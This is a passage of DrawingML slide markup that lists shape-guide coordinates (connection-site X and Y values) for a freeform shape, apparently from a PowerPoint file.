              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 375506 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5344297 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3637109 h 6858000"/>
              <a:gd name="connsiteX52" fmla="*/ 476962 w 1342244"/>
              <a:gd name="connsiteY52" fmla="*/ 3536883 h 6858000"/>
              <a:gd name="connsiteX53" fmla="*/ 484500 w 1342244"/>
              <a:gd name="connsiteY53" fmla="*/ 3435652 h 6858000"/>
              <a:gd name="connsiteX54" fmla="*/ 498392 w 1342244"/>
              <a:gd name="connsiteY54" fmla="*/ 3295862 h 6858000"/>
              <a:gd name="connsiteX55" fmla="*/ 504159 w 1342244"/>
              <a:gd name="connsiteY55" fmla="*/ 3229163 h 6858000"/>
              <a:gd name="connsiteX56" fmla="*/ 480918 w 1342244"/>
              <a:gd name="connsiteY56" fmla="*/ 3158586 h 6858000"/>
              <a:gd name="connsiteX57" fmla="*/ 456326 w 1342244"/>
              <a:gd name="connsiteY57" fmla="*/ 3112365 h 6858000"/>
              <a:gd name="connsiteX58" fmla="*/ 441801 w 1342244"/>
              <a:gd name="connsiteY58" fmla="*/ 3072935 h 6858000"/>
              <a:gd name="connsiteX59" fmla="*/ 416975 w 1342244"/>
              <a:gd name="connsiteY59" fmla="*/ 2958185 h 6858000"/>
              <a:gd name="connsiteX60" fmla="*/ 374255 w 1342244"/>
              <a:gd name="connsiteY60" fmla="*/ 2843952 h 6858000"/>
              <a:gd name="connsiteX61" fmla="*/ 308507 w 1342244"/>
              <a:gd name="connsiteY61" fmla="*/ 2554718 h 6858000"/>
              <a:gd name="connsiteX62" fmla="*/ 279324 w 1342244"/>
              <a:gd name="connsiteY62" fmla="*/ 2447068 h 6858000"/>
              <a:gd name="connsiteX63" fmla="*/ 283394 w 1342244"/>
              <a:gd name="connsiteY63" fmla="*/ 2423438 h 6858000"/>
              <a:gd name="connsiteX64" fmla="*/ 272284 w 1342244"/>
              <a:gd name="connsiteY64" fmla="*/ 2402874 h 6858000"/>
              <a:gd name="connsiteX65" fmla="*/ 274896 w 1342244"/>
              <a:gd name="connsiteY65" fmla="*/ 2381443 h 6858000"/>
              <a:gd name="connsiteX66" fmla="*/ 251225 w 1342244"/>
              <a:gd name="connsiteY66" fmla="*/ 2261920 h 6858000"/>
              <a:gd name="connsiteX67" fmla="*/ 241112 w 1342244"/>
              <a:gd name="connsiteY67" fmla="*/ 2195378 h 6858000"/>
              <a:gd name="connsiteX68" fmla="*/ 225329 w 1342244"/>
              <a:gd name="connsiteY68" fmla="*/ 2155135 h 6858000"/>
              <a:gd name="connsiteX69" fmla="*/ 222787 w 1342244"/>
              <a:gd name="connsiteY69" fmla="*/ 2118008 h 6858000"/>
              <a:gd name="connsiteX70" fmla="*/ 223780 w 1342244"/>
              <a:gd name="connsiteY70" fmla="*/ 2050531 h 6858000"/>
              <a:gd name="connsiteX71" fmla="*/ 196764 w 1342244"/>
              <a:gd name="connsiteY71" fmla="*/ 1906352 h 6858000"/>
              <a:gd name="connsiteX72" fmla="*/ 173321 w 1342244"/>
              <a:gd name="connsiteY72" fmla="*/ 1861531 h 6858000"/>
              <a:gd name="connsiteX73" fmla="*/ 127120 w 1342244"/>
              <a:gd name="connsiteY73" fmla="*/ 1732919 h 6858000"/>
              <a:gd name="connsiteX74" fmla="*/ 99431 w 1342244"/>
              <a:gd name="connsiteY74" fmla="*/ 1663540 h 6858000"/>
              <a:gd name="connsiteX75" fmla="*/ 98557 w 1342244"/>
              <a:gd name="connsiteY75" fmla="*/ 1615777 h 6858000"/>
              <a:gd name="connsiteX76" fmla="*/ 79352 w 1342244"/>
              <a:gd name="connsiteY76" fmla="*/ 1563678 h 6858000"/>
              <a:gd name="connsiteX77" fmla="*/ 85174 w 1342244"/>
              <a:gd name="connsiteY77" fmla="*/ 1477995 h 6858000"/>
              <a:gd name="connsiteX78" fmla="*/ 71259 w 1342244"/>
              <a:gd name="connsiteY78" fmla="*/ 1373769 h 6858000"/>
              <a:gd name="connsiteX79" fmla="*/ 79566 w 1342244"/>
              <a:gd name="connsiteY79" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX80" fmla="*/ 85439 w 1342244"/>
              <a:gd name="connsiteY80" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX81" fmla="*/ 77721 w 1342244"/>
              <a:gd name="connsiteY81" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX82" fmla="*/ 67027 w 1342244"/>
              <a:gd name="connsiteY82" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX83" fmla="*/ 55763 w 1342244"/>
              <a:gd name="connsiteY83" fmla="*/ 1016103 h 6858000"/>
              <a:gd name="connsiteX84" fmla="*/ 57219 w 1342244"/>
              <a:gd name="connsiteY84" fmla="*/ 954054 h 6858000"/>
              <a:gd name="connsiteX85" fmla="*/ 52084 w 1342244"/>
              <a:gd name="connsiteY85" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX86" fmla="*/ 21492 w 1342244"/>
              <a:gd name="connsiteY86" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX87" fmla="*/ 442 w 1342244"/>
              <a:gd name="connsiteY87" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX88" fmla="*/ 0 w 1342244"/>
              <a:gd name="connsiteY88" fmla="*/ 721230 h 6858000"/>
              <a:gd name="connsiteX89" fmla="*/ 9132 w 1342244"/>
              <a:gd name="connsiteY89" fmla="*/ 619315 h 6858000"/>
              <a:gd name="connsiteX90" fmla="*/ 2788 w 1342244"/>
              <a:gd name="connsiteY90" fmla="*/ 585934 h 6858000"/>
              <a:gd name="connsiteX91" fmla="*/ 84 w 1342244"/>
              <a:gd name="connsiteY91" fmla="*/ 538948 h 6858000"/>
              <a:gd name="connsiteX92" fmla="*/ 3992 w 1342244"/>
              <a:gd name="connsiteY92" fmla="*/ 525163 h 6858000"/>
              <a:gd name="connsiteX93" fmla="*/ 30116 w 1342244"/>
              <a:gd name="connsiteY93" fmla="*/ 446567 h 6858000"/>
              <a:gd name="connsiteX94" fmla="*/ 29364 w 1342244"/>
              <a:gd name="connsiteY94" fmla="*/ 393828 h 6858000"/>
              <a:gd name="connsiteX95" fmla="*/ 29194 w 1342244"/>
              <a:gd name="connsiteY95" fmla="*/ 353137 h 6858000"/>
              <a:gd name="connsiteX96" fmla="*/ 34887 w 1342244"/>
              <a:gd name="connsiteY96" fmla="*/ 275771 h 6858000"/>
              <a:gd name="connsiteX97" fmla="*/ 44581 w 1342244"/>
              <a:gd name="connsiteY97" fmla="*/ 236673 h 6858000"/>
              <a:gd name="connsiteX98" fmla="*/ 43624 w 1342244"/>
              <a:gd name="connsiteY98" fmla="*/ 144983 h 6858000"/>
              <a:gd name="connsiteX99" fmla="*/ 33909 w 1342244"/>
              <a:gd name="connsiteY99" fmla="*/ 33857 h 6858000"/>
              <a:gd name="connsiteX100" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY100" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX0" fmla="*/ 15462 w 1342244"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX1" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 6858000"/>
              <a:gd name="connsiteX2" fmla="*/ 1342244 w 1342244"/>
              <a:gd name="connsiteY2" fmla="*/ 6858000 h 6858000"/>
              <a:gd name="connsiteX3" fmla="*/ 78938 w 1342244"/>
              <a:gd name="connsiteY3" fmla="*/ 6857735 h 6858000"/>
              <a:gd name="connsiteX4" fmla="*/ 115531 w 1342244"/>
              <a:gd name="connsiteY4" fmla="*/ 6776847 h 6858000"/>
              <a:gd name="connsiteX5" fmla="*/ 127031 w 1342244"/>
              <a:gd name="connsiteY5" fmla="*/ 6737706 h 6858000"/>
              <a:gd name="connsiteX6" fmla="*/ 144438 w 1342244"/>
              <a:gd name="connsiteY6" fmla="*/ 6686827 h 6858000"/>
              <a:gd name="connsiteX7" fmla="*/ 156016 w 1342244"/>
              <a:gd name="connsiteY7" fmla="*/ 6633777 h 6858000"/>
              <a:gd name="connsiteX8" fmla="*/ 228859 w 1342244"/>
              <a:gd name="connsiteY8" fmla="*/ 6492130 h 6858000"/>
              <a:gd name="connsiteX9" fmla="*/ 244546 w 1342244"/>
              <a:gd name="connsiteY9" fmla="*/ 6431610 h 6858000"/>
              <a:gd name="connsiteX10" fmla="*/ 271474 w 1342244"/>
              <a:gd name="connsiteY10" fmla="*/ 6334727 h 6858000"/>
              <a:gd name="connsiteX11" fmla="*/ 263386 w 1342244"/>
              <a:gd name="connsiteY11" fmla="*/ 6294334 h 6858000"/>
              <a:gd name="connsiteX12" fmla="*/ 251160 w 1342244"/>
              <a:gd name="connsiteY12" fmla="*/ 6231403 h 6858000"/>
              <a:gd name="connsiteX13" fmla="*/ 243818 w 1342244"/>
              <a:gd name="connsiteY13" fmla="*/ 6202459 h 6858000"/>
              <a:gd name="connsiteX14" fmla="*/ 242616 w 1342244"/>
              <a:gd name="connsiteY14" fmla="*/ 6153037 h 6858000"/>
              <a:gd name="connsiteX15" fmla="*/ 255587 w 1342244"/>
              <a:gd name="connsiteY15" fmla="*/ 6061464 h 6858000"/>
              <a:gd name="connsiteX16" fmla="*/ 245418 w 1342244"/>
              <a:gd name="connsiteY16" fmla="*/ 6028119 h 6858000"/>
              <a:gd name="connsiteX17" fmla="*/ 230647 w 1342244"/>
              <a:gd name="connsiteY17" fmla="*/ 5926735 h 6858000"/>
              <a:gd name="connsiteX18" fmla="*/ 280159 w 1342244"/>
              <a:gd name="connsiteY18" fmla="*/ 5712857 h 6858000"/>
              <a:gd name="connsiteX19" fmla="*/ 309957 w 1342244"/>
              <a:gd name="connsiteY19" fmla="*/ 5660491 h 6858000"/>
              <a:gd name="connsiteX20" fmla="*/ 323969 w 1342244"/>
              <a:gd name="connsiteY20" fmla="*/ 5553910 h 6858000"/>
              <a:gd name="connsiteX21" fmla="*/ 348400 w 1342244"/>
              <a:gd name="connsiteY21" fmla="*/ 5449031 h 6858000"/>
              <a:gd name="connsiteX22" fmla="*/ 359524 w 1342244"/>
              <a:gd name="connsiteY22" fmla="*/ 5396260 h 6858000"/>
              <a:gd name="connsiteX23" fmla="*/ 385283 w 1342244"/>
              <a:gd name="connsiteY23" fmla="*/ 5341916 h 6858000"/>
              <a:gd name="connsiteX24" fmla="*/ 423664 w 1342244"/>
              <a:gd name="connsiteY24" fmla="*/ 5264214 h 6858000"/>
              <a:gd name="connsiteX25" fmla="*/ 429823 w 1342244"/>
              <a:gd name="connsiteY25" fmla="*/ 5225268 h 6858000"/>
              <a:gd name="connsiteX26" fmla="*/ 438105 w 1342244"/>
              <a:gd name="connsiteY26" fmla="*/ 5159961 h 6858000"/>
              <a:gd name="connsiteX27" fmla="*/ 441715 w 1342244"/>
              <a:gd name="connsiteY27" fmla="*/ 5125185 h 6858000"/>
              <a:gd name="connsiteX28" fmla="*/ 455581 w 1342244"/>
              <a:gd name="connsiteY28" fmla="*/ 5067850 h 6858000"/>
              <a:gd name="connsiteX29" fmla="*/ 458312 w 1342244"/>
              <a:gd name="connsiteY29" fmla="*/ 5060861 h 6858000"/>
              <a:gd name="connsiteX30" fmla="*/ 456570 w 1342244"/>
              <a:gd name="connsiteY30" fmla="*/ 4993030 h 6858000"/>
              <a:gd name="connsiteX31" fmla="*/ 463479 w 1342244"/>
              <a:gd name="connsiteY31" fmla="*/ 4946844 h 6858000"/>
              <a:gd name="connsiteX32" fmla="*/ 474738 w 1342244"/>
              <a:gd name="connsiteY32" fmla="*/ 4858827 h 6858000"/>
              <a:gd name="connsiteX33" fmla="*/ 480641 w 1342244"/>
              <a:gd name="connsiteY33" fmla="*/ 4821170 h 6858000"/>
              <a:gd name="connsiteX34" fmla="*/ 486667 w 1342244"/>
              <a:gd name="connsiteY34" fmla="*/ 4750867 h 6858000"/>
              <a:gd name="connsiteX35" fmla="*/ 484474 w 1342244"/>
              <a:gd name="connsiteY35" fmla="*/ 4690749 h 6858000"/>
              <a:gd name="connsiteX36" fmla="*/ 479954 w 1342244"/>
              <a:gd name="connsiteY36" fmla="*/ 4584173 h 6858000"/>
              <a:gd name="connsiteX37" fmla="*/ 475037 w 1342244"/>
              <a:gd name="connsiteY37" fmla="*/ 4444346 h 6858000"/>
              <a:gd name="connsiteX38" fmla="*/ 471602 w 1342244"/>
              <a:gd name="connsiteY38" fmla="*/ 4375228 h 6858000"/>
              <a:gd name="connsiteX39" fmla="*/ 452255 w 1342244"/>
              <a:gd name="connsiteY39" fmla="*/ 4214165 h 6858000"/>
              <a:gd name="connsiteX40" fmla="*/ 453884 w 1342244"/>
              <a:gd name="connsiteY40" fmla="*/ 4076008 h 6858000"/>
              <a:gd name="connsiteX41" fmla="*/ 441584 w 1342244"/>
              <a:gd name="connsiteY41" fmla="*/ 4033999 h 6858000"/>
              <a:gd name="connsiteX42" fmla="*/ 441309 w 1342244"/>
              <a:gd name="connsiteY42" fmla="*/ 4013953 h 6858000"/>
              <a:gd name="connsiteX43" fmla="*/ 427604 w 1342244"/>
              <a:gd name="connsiteY43" fmla="*/ 3974753 h 6858000"/>
              <a:gd name="connsiteX44" fmla="*/ 433387 w 1342244"/>
              <a:gd name="connsiteY44" fmla="*/ 3901461 h 6858000"/>
              <a:gd name="connsiteX45" fmla="*/ 455981 w 1342244"/>
              <a:gd name="connsiteY45" fmla="*/ 3813873 h 6858000"/>
              <a:gd name="connsiteX46" fmla="*/ 453239 w 1342244"/>
              <a:gd name="connsiteY46" fmla="*/ 3777135 h 6858000"/>
              <a:gd name="connsiteX47" fmla="*/ 454972 w 1342244"/>
              <a:gd name="connsiteY47" fmla="*/ 3771656 h 6858000"/>
              <a:gd name="connsiteX48" fmla="*/ 458715 w 1342244"/>
              <a:gd name="connsiteY48" fmla="*/ 3769007 h 6858000"/>
              <a:gd name="connsiteX49" fmla="*/ 466877 w 1342244"/>
              <a:gd name="connsiteY49" fmla="*/ 3738082 h 6858000"/>
              <a:gd name="connsiteX50" fmla="*/ 474223 w 1342244"/>
              <a:gd name="connsiteY50" fmla="*/ 3673397 h 6858000"/>
              <a:gd name="connsiteX51" fmla="*/ 473519 w 1342244"/>
              <a:gd name="connsiteY51" fmla="*/ 3637109 h 6858000"/>
